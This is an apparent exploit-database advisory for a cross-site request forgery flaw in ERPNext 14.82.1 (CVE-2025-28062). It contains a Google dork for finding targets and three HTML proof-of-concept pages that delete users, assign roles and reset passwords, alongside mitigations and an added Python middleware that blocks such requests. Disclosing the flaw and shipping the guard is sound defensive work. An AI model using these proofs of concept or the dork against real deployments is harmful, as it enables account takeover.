| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2025-28062 | 5 May 2025 20:03 | – | circl |
| ERPNext Cross-Site Request Forgery Vulnerability | 5 May 2025 00:00 | – | cnnvd |
| ERPNext Cross-Site Request Forgery Vulnerability | 14 May 2025 00:00 | – | cnvd |
| CVE-2025-28062 | 5 May 2025 00:00 | – | cve |
| CVE-2025-28062 | 5 May 2025 00:00 | – | cvelist |
| EUVD-2025-13459 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2025-28062 | 5 May 2025 16:15 | – | nvd |
| CVE-2025-28062 | 5 May 2025 16:15 | – | osv |
| ERPNext 14.82.1 Cross Site Request Forgery | 6 May 2025 00:00 | – | packetstorm |
| PT-2025-19726 · Erpnext · Erpnext | 5 May 2025 00:00 | – | ptsecurity |

# Exploit Title: ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)
# Google Dork: inurl:"/api/method/frappe"
# Date: 2025-04-29
# Exploit Author: Ahmed Thaiban (Thvt0ne)
# Vendor Homepage: https://erpnext.com
# Software Link: https://github.com/frappe/erpnext
# Version: <= 14.82.1, 14.74.3 (Tested)
# Tested on: Linux (Ubuntu 20.04), Chrome, Firefox.
# CVE : CVE-2025-28062
# Category: WebApps
# Description:
A Cross-Site Request Forgery (CSRF) vulnerability leading to account takeover exists in ERPNext 14.82.1 and 14.74.3. This flaw allows an attacker to perform unauthorized state-changing operations on behalf of a logged-in administrator without their knowledge or consent.
Affected endpoints include:
- /api/method/frappe.desk.reportview.delete_items
- /api/method/frappe.desk.form.save.savedocs
Impact:
- Deletion of arbitrary users
- Unauthorized role assignment
- Account takeover via password change
The application fails to enforce CSRF tokens on administrative API requests, violating OWASP recommendations.
---
# PoC 1: Delete a User
<html>
<body>
<h2>Delete User</h2>
<a href="http://target/api/method/frappe.desk.reportview.delete_items?items=%5B%221%401.com%22%5D&doctype=User">
Click Here
</a>
</body>
</html>
---
# PoC 2: Assign Role
<html>
<body>
<h2>Assign Role to User</h2>
<a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
Add Role
</a>
</body>
</html>
---
# PoC 3: Reset Password
<html>
<body>
<h2>Reset User Password</h2>
<a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
Reset Password
</a>
</body>
</html>
---
# Mitigation:
- Enforce CSRF protection for all administrative endpoints
- Require POST methods for state changes
- Mark cookies as SameSite=Strict
- Implement re-authentication for critical user changes
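
As an added example (not part of the original advisory and not ERPNext/Frappe code), a WSGI guard that applies the first two mitigations to the two endpoints listed above: it rejects non-POST requests, cross-origin requests and requests lacking the session's CSRF token. The header name, the token_for session lookup and the host names are assumptions.

```python
import hmac
from urllib.parse import urlsplit

# Endpoints the advisory lists as changing state without a CSRF token check.
GUARDED = ("/api/method/frappe.desk.reportview.delete_items",
           "/api/method/frappe.desk.form.save.savedocs")
TOKEN_HEADER = "HTTP_X_CSRF_TOKEN"  # assumed header name, not from the advisory


def csrf_verdict(environ, session_token, allowed_host):
    """Return None when the request may proceed, else the rejection reason."""
    if environ.get("PATH_INFO", "") not in GUARDED:
        return None
    if environ.get("REQUEST_METHOD") != "POST":
        return "state change requires POST"
    # Browsers send Origin on cross-site POSTs; fall back to Referer, and
    # treat a request carrying neither as cross-origin.
    source = environ.get("HTTP_ORIGIN") or environ.get("HTTP_REFERER") or ""
    if urlsplit(source).netloc != allowed_host:
        return "cross-origin request"
    sent = environ.get(TOKEN_HEADER, "").encode()
    if not session_token or not hmac.compare_digest(sent, session_token.encode()):
        return "missing or wrong CSRF token"
    return None


class CsrfGuard:
    """WSGI middleware; token_for(environ) is a hypothetical session lookup."""

    def __init__(self, app, token_for, allowed_host):
        self.app, self.token_for, self.allowed_host = app, token_for, allowed_host

    def __call__(self, environ, start_response):
        reason = csrf_verdict(environ, self.token_for(environ), self.allowed_host)
        if reason is None:
            return self.app(environ, start_response)
        body = reason.encode()
        start_response("403 Forbidden", [("Content-Type", "text/plain"),
                                         ("Content-Length", str(len(body)))])
        return [body]


# Constructed sample: the kind of GET a followed link produces.
LINK_GET = {"REQUEST_METHOD": "GET", "PATH_INFO": GUARDED[0],
            "HTTP_REFERER": "https://other.example/page"}
```

A production deployment would extend GUARDED to every state-changing method rather than only the two named here.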
---
# Disclosure Timeline:
- 2025-02-09: Vulnerability discovered
- 2025-02-10: Reported to Frappe (no response)
- 2025-04-29: Public disclosure via CVE + advisory
---
# Author Contact:
LinkedIn: https://linkedin.com/in/ahmedth
GitHub: https://github.com/Thvt0ne
# References:
- https://owasp.org/www-community/attacks/csrf